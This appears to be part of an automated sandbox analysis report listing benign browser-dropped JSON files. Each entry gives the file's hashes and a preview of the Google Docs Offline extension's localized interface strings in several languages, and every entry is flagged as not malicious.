                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):838
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                                                                                          MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                                                                                          SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                                                                                          SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                                                                                          SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1305
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                                                          MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                                                          SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                                                          SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                                                          SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):911
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                                                                                          MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                                                          SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                                                          SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                                                          SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):939
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                                                          MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                                                                                          SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                                                                                          SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                                                          SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):977
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                                                          MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                                                          SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                                                          SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                                                          SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):972
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                                                          MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                                                          SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                                                          SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                                                          SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):990
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                                                                                          MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                                                                                          SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                                                                                          SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                                                                                          SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1658
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                                                                                          MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                                                                                          SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                                                                                          SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                                                                                          SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1672
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                                                                                          MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                                                                                          SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                                                                                          SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                                                                                          SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):935
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                                                                                          MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                                                                                                          SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                                                                                          SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                                                                                          SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1065
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                                                                                                          MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                                                                                                          SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                                                                                                          SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                                                                                                          SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2771
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                                                          MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                                                          SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                                                          SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                                                          SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):858
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                                                          MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                                                          SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                                                          SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                                                          SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):954
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                                                          MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                                                          SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                                                          SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                                                          SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):899
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                                                          MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                                                          SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                                                          SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                                                          SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2230
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                                          MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                                          SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                                          SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                                                          SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                                          Malicious:false
